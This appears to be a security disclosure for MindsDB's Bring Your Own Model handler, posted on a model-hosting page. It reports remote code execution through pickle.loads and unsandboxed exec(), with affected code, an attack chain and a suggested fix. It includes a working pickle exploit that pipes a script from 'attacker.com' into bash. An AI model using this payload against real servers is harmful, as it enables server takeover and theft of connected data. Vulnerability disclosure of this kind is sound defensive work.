YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

MindsDB β€” RCE via pickle.loads() in BYOM (Bring Your Own Model) Handler

Vulnerability Type

CWE-502: Deserialization of Untrusted Data

Severity

Critical β€” Any user who can create a BYOM model achieves Remote Code Execution on the MindsDB server.

Affected Code

File: mindsdb/integrations/handlers/byom_handler/byom_handler.py

Three functions deserialize user-controlled model state:

# Line 398 β€” predict()
def predict(self, df, model_state, args):
    model_state = pickle.loads(model_state)  # ← RCE
    self.model_instance.__dict__ = model_state

# Line 407 β€” finetune()
def finetune(self, df, model_state, args):
    self.model_instance.__dict__ = pickle.loads(model_state)  # ← RCE

# Line 419 β€” describe()
def describe(self, model_state, attribute=None):
    model_state = pickle.loads(model_state)  # ← RCE
    self.model_instance.__dict__ = model_state

Also affected:

mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:55:

model_state = pickle.loads(model_state)  # subprocess wrapper

mindsdb/interfaces/query_context/context_controller.py:275:

steps_data = pickle.loads(data)  # from cache

mindsdb/integrations/libs/process_cache.py:45:

# IPC via pickle β€” exception propagation

Attack Chain

  1. Attacker creates a BYOM model via MindsDB SQL:
CREATE MODEL pwned
PREDICT target
USING engine='byom',
      code='class Model: pass';
  1. The model's train() returns pickle.dumps(self.__dict__) β€” but an attacker who controls the model code can override __dict__ to contain a malicious pickle payload

  2. When predict() is called (e.g., SELECT * FROM pwned WHERE ...), the server deserializes the model state with pickle.loads(model_state) β†’ arbitrary code execution

Alternative: Direct state injection

If the attacker has access to the MindsDB storage backend (database), they can directly replace the model state bytes with a malicious pickle:

import pickle, os
class Exploit:
    def __reduce__(self):
        return (os.system, ('curl attacker.com/shell.sh | bash',))

malicious_state = pickle.dumps(Exploit())
# Insert into model storage β†’ next predict() = RCE

AI Impact (10x Multiplier)

MindsDB is an AI-in-database platform. The BYOM handler is specifically designed for users to bring custom ML models. Compromising it enables:

  • Model poisoning β€” replace legitimate model with backdoored version
  • Training data exfiltration β€” RCE gives access to all data MindsDB has access to
  • Database compromise β€” MindsDB connects to user databases (MySQL, PostgreSQL, etc.), RCE gives access to all connected data sources
  • Supply chain β€” poisoned model persists across restarts and affects all queries

Known CVE Context

MindsDB has prior deserialization CVEs (CVE-2024-45846, CVE-2024-45847 β€” eval injection via Weaviate integration). This BYOM pickle.loads is a different, previously unreported vector.

Suggested Fix

Replace pickle.loads with a safe alternative:

import json
import jsonpickle

def predict(self, df, model_state, args):
    # Use JSON-based deserialization instead of pickle
    model_state = json.loads(model_state)
    # Or use restricted unpickler:
    # model_state = RestrictedUnpickler(io.BytesIO(model_state)).load()
    self.model_instance.__dict__ = model_state

Invariant Violated

S16 (DeserializationGuard): Application MUST NOT use pickle.loads on data from user-controlled or shared storage.

Additional Finding: Direct exec() on User Model Code

File: mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80

def import_string(code, module_name='model'):
    module = types.ModuleType(module_name)
    exec(code, module.__dict__)  # ← Direct code execution, NO sandbox
    return module

This is the execution path for BYOM models. When a user creates a model with engine='byom', their Python code is passed to import_string() which calls exec() with no sandboxing, no AST filtering, no import restrictions.

The same file also uses pickle.loads() for IPC (stdin/stdout between parent and worker):

def decode(encoded):
    return pickle.loads(encoded)  # Line 55

def get_input():
    with open(0, 'rb') as fd:
        encoded = fd.read()
        obj = decode(encoded)  # pickle.loads on stdin

Combined Chain

  1. User creates BYOM model with malicious code β†’ exec(code) β†’ RCE
  2. Even if exec were sandboxed, the pickle IPC channel is unprotected β†’ pickle.loads bypass

This is a defense-in-depth failure β€” two independent RCE vectors in the same module.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support